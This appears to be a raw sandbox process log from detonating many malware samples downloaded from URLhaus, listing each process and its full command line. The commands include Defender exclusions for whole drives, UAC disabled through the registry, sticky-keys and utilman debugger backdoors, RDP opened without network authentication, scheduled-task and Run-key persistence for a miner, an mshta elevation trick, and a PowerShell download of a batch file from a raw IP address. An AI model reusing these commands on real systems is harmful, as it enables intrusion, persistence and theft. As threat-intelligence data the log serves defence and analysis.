"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll' }) { exit 0 } else { exit 1 }"

C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4DAE.tmp\4DAF.tmp\4DB0.bat C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Quzg8YkU0P.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7876 -ip 7876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7876 -s 536

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hfs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hfs.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\wow.exe

"C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\GameBarPresenceWriter.exe

"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer

C:\Users\Admin\Downloads\UrlHausFiles\sound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\sound.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Users\Admin\Downloads\UrlHausFiles\logon.exe

"C:\Users\Admin\Downloads\UrlHausFiles\logon.exe"

C:\Users\Admin\Downloads\UrlHausFiles\build.exe

"C:\Users\Admin\Downloads\UrlHausFiles\build.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\mi.exe

"C:\Users\Admin\Downloads\UrlHausFiles\mi.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\add.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe

"C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe"

C:\Users\Admin\AppData\Local\Temp\6174.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\6174.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\c2.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c2.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\SYSTEM32\notepad.exe

notepad.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6728 -ip 6728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 1308

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\networks.ps1"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1640 -ip 1640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{A216281A-61ED-46A4-F26C-4347B2F31750}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1372

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'AutoUpdate.exe'

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\stail.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted')

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Users\Admin\AppData\Local\Temp\is-7IIHE.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7IIHE.tmp\stail.tmp" /SL5="$204B8,3299853,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe

"C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe"

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"

C:\Users\Admin\Downloads\UrlHausFiles\readme.exe

"C:\Users\Admin\Downloads\UrlHausFiles\readme.exe"

C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe

"C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1640 -ip 1640

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause powerful_player_1242

C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe

"C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe" -i

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause powerful_player_1242

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" /flushdns

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3504 -ip 3504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3504 -ip 3504

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\967E.tmp\968F.tmp\9690.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1520

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x320 0x4a8

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcc45b46f8,0x7ffcc45b4708,0x7ffcc45b4718

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'NGUBAPK.exe'

C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe

"C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

C:\Users\Admin\AppData\Local\Temp\is-5DRQB.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5DRQB.tmp\stail.tmp" /SL5="$503AA,3299853,54272,C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4704 -ip 4704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1276

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B38C.tmp\B38D.tmp\B38E.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 4726' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network4726Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcc45b46f8,0x7ffcc45b4708,0x7ffcc45b4718

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\BKECAEBGHDAE" & exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\DOWNLO~1\URLHAU~1\PowerShell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\app64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -standby-timeout-ac 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Windows\system32\cmd.exe

cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\abc.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -hibernate-timeout-ac 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3236 -ip 3236

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

"C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 336

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 1

C:\Windows\SysWOW64\powercfg.exe

Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe

"C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe"

C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe

"C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE

C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE5C7.tmp.bat

C:\Users\Admin\AppData\Local\Temp\is-M62BQ.tmp\KUWAIT~1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-M62BQ.tmp\KUWAIT~1.tmp" /SL5="$3044C,3849412,851968,C:\Users\Admin\DOWNLO~1\URLHAU~1\KUWAIT~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\bp.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

